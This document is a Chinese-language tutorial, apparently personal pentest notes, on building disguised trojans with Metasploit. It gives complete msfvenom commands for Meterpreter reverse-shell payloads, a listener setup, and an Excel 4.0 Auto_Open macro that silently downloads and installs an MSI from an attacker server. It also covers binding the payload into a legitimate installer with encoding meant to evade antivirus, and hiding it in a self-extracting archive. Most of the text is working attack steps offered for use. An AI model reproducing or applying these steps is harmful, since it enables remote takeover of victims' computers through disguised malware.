恶意Excel文件生成

linux下, msf 生成恶意 msi 文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.1 lport=10000 -f msi -o shell.msi

msf 建立监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.1
set lport 10000
run
// 或 exploit -j		持续监听

python 在具有恶意的msi的文件夹下开启http服务

python3 -m http.server 80

到 windows 下, 新建一个 Excel

想要查看文件后缀名进行如下修改:

image-20240330005121535

打开后右键底部Sheet, 点击插入, 选择MS Excel 4.0宏表

=EXEC("msiexec /q /ihttp://192.168.10.1/shell.msi")			// 第一格, 调用执行服务器上的dayu.msi文件
=HALT()        // 第二格, 标识Excel 4.0宏结束

第一格, 左上角的A1模式手动输入:Auto_Open,Enter回车 image-20240330004527097

右键底部宏1, 选择隐藏 ctrl+s 保存, 弹出提示选择, 弹出的另存为选择Excel 启用宏的工作簿, 后缀为.xlsm

现在桌面上.xlsm就是伪装过的木马

打开后提示宏已经被禁用, 启用后就可以在Linux上发现连接上了 image-20240330011728376

正常的软件和恶意木马打包

不免杀 msf 捆绑

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.1 lport=10000 -e x86/shikata_ga_nai -i 15 -f exe -b '\x00\x0a\x0d' -x ~/Desktop/inst.exe > ~/Desktop/Trojan/test_msf_360.exe
// ~/Desktop/inst.exe 原来的软件 输出的是捆绑的木马软件
// -e x86/shikata_ga_nai 选择一个常见的编码器,用于避免某些安全产品的检测
// -i 15 指定迭代次数

自解压捆绑

给虚拟机安装压缩软件 winrar

msf 生成木马, 利用 python 开启 http 服务让靶机下载 木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.1 lport=10000 -f exe -o shell.php

选中正常文件和木马, 右键选择添加到压缩文件

常规选项卡勾选穿创建自解压格式压缩文件, 在高级选项卡点击自解压选项

新窗口中选择设置选项卡, 解压前运行填入木马, 解压后运行填入正常文件

运行自解压格式, 返回 linux 发现已经上线

image-20240330014501882